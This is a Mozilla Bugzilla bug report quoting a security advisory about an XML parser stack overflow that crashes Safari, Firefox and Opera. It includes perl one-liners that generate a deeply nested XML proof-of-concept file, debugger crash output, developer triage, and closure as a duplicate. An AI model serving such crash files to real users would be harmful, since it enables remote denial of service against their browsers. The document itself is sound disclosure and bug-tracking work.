Apple Safari, Mozilla Firefox and Opera browser Remote Denial of Service

RESOLVED DUPLICATE of bug 485941

Status

()

Core
Layout
--
critical
RESOLVED DUPLICATE of bug 485941
8 years ago
8 years ago

People

(Reporter: ISecAuditors Security Advisories, Unassigned)

Tracking

({testcase})

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:dos] stack-overflow)

Attachments

(2 attachments)

(Reporter)

Description

8 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)
Build Identifier: Mozilla Firefox 3.6

III. DESCRIPTION
-------------------------
The XML parser of the browsers Safari, Firefox and Opera are affected by a Stack Exhaustion (Stack Overflow) due to incorrect handling of XML files, resulting in a remote denial of service, crashing the affected users browser.

IV. PROOF OF CONCEPT
-------------------------
$ perl -e 'print "<?xml version = \"1.0\"?><root><element>" . "<x>y"x30000 . "</element></root>"' > poc.xml

or simply:

$ perl -e 'print "<x>y"x30000' > poc.xml

(Opera crashes at ~7K, Safari at ~9K and Firefox at ~30K)

[...]

+ Firefox 3.6 on Windows XP SP2:

(dfc.f14): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0332e348 ecx=054d0550 edx=036ee700 esi=00000000 edi=0332e348
eip=100f1338 esp=00033000 ebp=00000000 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Archivos de programa\Mozilla Firefox\xul.dll - 
xul!NS_Realloc_P+0x3f68:
100f1338 56              push    esi
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:000> !analyze -v
(...)
FAULTING_IP: 
xul!NS_Realloc_P+3f68
100f1338 56              push    esi

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 100f1338 (xul!NS_Realloc_P+0x00003f68)
   ExceptionCode: c00000fd (Stack overflow)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 00032ffc

FAULTING_THREAD:  00000f14

PROCESS_NAME:  firefox.exe

ADDITIONAL_DEBUG_TEXT:  
Use '!findthebuild' command to search for the target build information.
If the build information is available, run '!findthebuild -s ; .reload' to set symbol path and load symbols.

MODULE_NAME: xul

FAULTING_MODULE: 7c910000 ntdll

DEBUG_FLR_IMAGE_TIMESTAMP:  4b5101ce

ERROR_CODE: (NTSTATUS) 0xc00000fd - No es posible crear una nueva p gina de seguridad para la pila.

EXCEPTION_CODE: (NTSTATUS) 0xc00000fd - No es posible crear una nueva p gina de seguridad para la pila.

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  00032ffc

DEFAULT_BUCKET_ID:  STACK_OVERFLOW

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_WRONG_SYMBOLS

LAST_CONTROL_TRANSFER:  from 00000000 to 100f1338

TACK_TEXT:              
00000000 00000000 00000000 00000000 00000000 xul!NS_Realloc_P+0x3f68

(...)


[...]


V. BUSINESS IMPACT
-------------------------
Attackers can use this vulnerability to cause a remote denial of service to end users.

Reproducible: Always

Actual Results:  
DoS web browser


VI. SYSTEMS AFFECTED
-------------------------
Tested latest verion of each product, others may be affected:
Apple Safari 4.0.4
Mozilla Firefox 3.6
Opera 10.10
Created attachment 427791 [details]
PoC

PoC per comment 0.
Created attachment 427793 [details]
PoC 2

Other PoC from comment 0.
This would be [sg:dos] anyway, but I can't confirm the crash.  Both testcases give me a XML parser error, so I'm not even getting to the stack exhaustion part.  I'm going to unhide this as we have a number of similar bugs such as bug 485941.
Group: core-security
Component: General → XUL
Keywords: testcase
Product: Firefox → Core
QA Contact: general → xptoolkit.widgets
Whiteboard: [sg:dos] stack-overflow

Comment 4

8 years ago
Isn't this just a duplicate of bug 485941?

Reed, why did you move this to XUL?  There's no XUL involved here (other than libxul, which is just the layout/dom/etc library).
(In reply to comment #4)
> Isn't this just a duplicate of bug 485941?

If it is, please feel free to mark it as such.

> Reed, why did you move this to XUL?  There's no XUL involved here (other than
> libxul, which is just the layout/dom/etc library).

My apologies. I assume the correct component would be Core :: Layout then?

Comment 6

8 years ago
Yeah.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 8 years ago
Component: XUL → Layout
QA Contact: xptoolkit.widgets → layout
Resolution: --- → DUPLICATE
Duplicate of bug: 485941
You need to log in before you can comment on or make changes to this bug.